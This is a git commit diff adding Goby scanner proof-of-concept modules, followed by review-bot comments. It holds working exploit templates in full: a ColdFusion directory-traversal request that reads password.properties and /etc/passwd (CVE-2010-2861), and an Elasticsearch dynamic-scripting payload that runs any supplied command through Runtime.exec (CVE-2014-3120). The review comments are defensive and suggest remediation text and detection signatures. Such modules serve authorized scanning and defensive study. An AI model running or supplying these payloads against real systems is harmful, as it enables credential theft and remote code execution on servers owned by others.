add some goby poc
cckuailong committed Dec 7, 2021
1 parent 3331c19 commit e2afcf5
Showing 223 changed files with 3,753 additions and 2 deletions.
3 changes: 1 addition & 2 deletions .gitignore
@@ -1,2 +1 @@
script/
CVE-2021-41773/
script/
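--- a/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
+++ b/2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
@@ -0,0 +1,103 @@
+{
+"Name": "Coldfusion LFI CVE-2010-2861",
+"Level": "2",
+"Tags": [
+"lfi"
+],
+"GobyQuery": "app=\"Adobe-ColdFusion\"",
+"Description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.",
+"Product": "Adobe ColdFusion",
+"Homepage": "https://www.adobe.com/products/coldfusion-family.html",
+"Author": "aetkrad",
+"Impact": "<p>read arbitrary files<br></p>",
+"Recommendation": "",
+"References": [],
+"HasExp": true,
+"ExpParams": [
+{
+"Name": "Filepath",
+"Type": "select",
+"Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en"
+}
+],
+"ExpTips": {
+"Type": "",
+"Content": ""
+},
+"ScanSteps": [
+"AND",
+{
+"Request": {
+"method": "GET",
+"uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
+"follow_redirect": true,
+"header": null,
+"data_type": "text",
+"data": "",
+"set_variable": []
+},
+"ResponseTest": {
+"type": "group",
+"operation": "AND",
+"checks": [
+{
+"type": "item",
+"variable": "$code",
+"operation": "==",
+"value": "200",
+"bz": ""
+},
+{
+"type": "item",
+"variable": "$body",
+"operation": "contains",
+"value": "rdspassword=",
+"bz": ""
+},
+{
+"type": "item",
+"variable": "$body",
+"operation": "contains",
+"value": "encrypted=",
+"bz": ""
+}
+]
+},
+"SetVariable": [
+"output|lastbody|regex|"
+]
+}
+],
+"ExploitSteps": [
+"AND",
+{
+"Request": {
+"method": "GET",
+"uri": "/CFIDE/administrator/enter.cfm?locale={{{cmd}}}",
+"follow_redirect": true,
+"header": null,
+"data_type": "text",
+"data": "",
+"set_variable": []
+},
+"ResponseTest": {
+"type": "group",
+"operation": "AND",
+"checks": [
+{
+"type": "item",
+"variable": "$code",
+"operation": "==",
+"value": "200",
+"bz": ""
+}
+]
+},
+"SetVariable": [
+"output|lastbody||"
+]
+}
+],
+"PostTime": "2021-11-08 15:51:21",
+"GobyVersion": "1.8.302"
+}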
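Review bot: The "Recommendation" and "References" fields are left empty even though the Description already pins the affected versions as ColdFusion 9.0.1 and earlier, so the record ships without any remediation guidance; suggest `"Recommendation": "<p>Upgrade to a ColdFusion release later than 9.0.1 and restrict network access to /CFIDE/administrator/.</p>"` and listing the CVE-2010-2861 advisory under References (URL left to the author). It is also worth documenting, in Description or ExpTips, that the scan step's `output|lastbody` captures the body of lib/password.properties (the `rdspassword=` / `encrypted=` lines it asserts on), so the output of a plain scan with this check contains credential material and needs to be stored and shared accordingly. For defenders, the request shape asserted here — a GET to /CFIDE/administrator/enter.cfm with traversal sequences and a `%00` in the locale parameter — is the concrete pattern to alert on.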
@@ -0,0 +1,191 @@
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
)

func init() {
expJson := `{
"Name": "Elasticsearch Remote Code Execution CVE-2014-3120",
"Description": "The default configuration before Elasticsearch 1.2 enabled dynamic scripting, which allowed remote attackers to execute arbitrary MVEL expressions and Java code through the source parameter of _search.",
"Product": "Elasticsearch",
"Homepage": "https://gobies.org/",
"DisclosureDate": "2021-04-10",
"Author": "zhzyker",
"GobyQuery": "product=elasticsearch",
"Level": "3",
"Impact": "<p>ElasticSearch is an open source, distributed, RESTful search engine built on Lucene. Designed for use in cloud computing, it can achieve real-time, stable, reliable and fast search, and is easy to install and use. Supports data indexing via HTTP request and using JSON.</p><p>Since ElasticSearch has enabled dynamic script execution by default, any user can execute arbitrary Java code by constructing a specially crafted submission.</p>",
"Recommandation": "<p>The official version of elasticsearch 1.2 has been publicly released, and the dynamic script execution function is disabled by default.<br></p>",
"References": [
"https://github.com/zhzyker"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/website/blog/",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{ \"name\": \"cve-2014-3120\" }"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": "http_code"
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/_search?pretty",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"echo 0d455d3d2044e6e7781771d932e68dbc_goby_nb\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "0d455d3d2044e6e7781771d932e68dbc",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/website/blog/",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{ \"name\": \"cve-2014-3120\" }"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": "http_code"
}
]
},
"SetVariable": [
"output|lastbody"
]
},
{
"Request": {
"method": "POST",
"uri": "/_search?pretty",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"{{{cmd}}}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": "http_code"
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)\"command\" : (.*)}"
]
}
],
"Tags": [
"RCE"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
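Review bot: The metadata key `"Recommandation"` in the expJson literal is misspelled; the CVE-2010-2861 JSON added in this same commit uses `"Recommendation"`, so if the loader matches that spelling the remediation text here is silently dropped — rename the key to `"Recommendation"`. In the same literal `"CVEIDs": null` should carry the identifier the Name already states, `"CVEIDs": ["CVE-2014-3120"]`, and `"DisclosureDate": "2021-04-10"` together with `"Homepage": "https://gobies.org/"` look like PoC-authoring metadata rather than the vulnerability's disclosure date and the product homepage, which is worth confirming. The ExpParams entry uses lowercase `name`/`type`/`value` while the JSON file in this commit uses `Name`/`Type`/`Value`; presumably only one of the two spellings is what the loader reads. Both ScanSteps and ExploitSteps first POST a document to /website/blog/ (asserting a 201) before calling /_search with script_fields, so even the detection-only scan writes an index document to the target; that side effect belongs in Description or ExpTips, and the same request pair is the signature defenders can alert on.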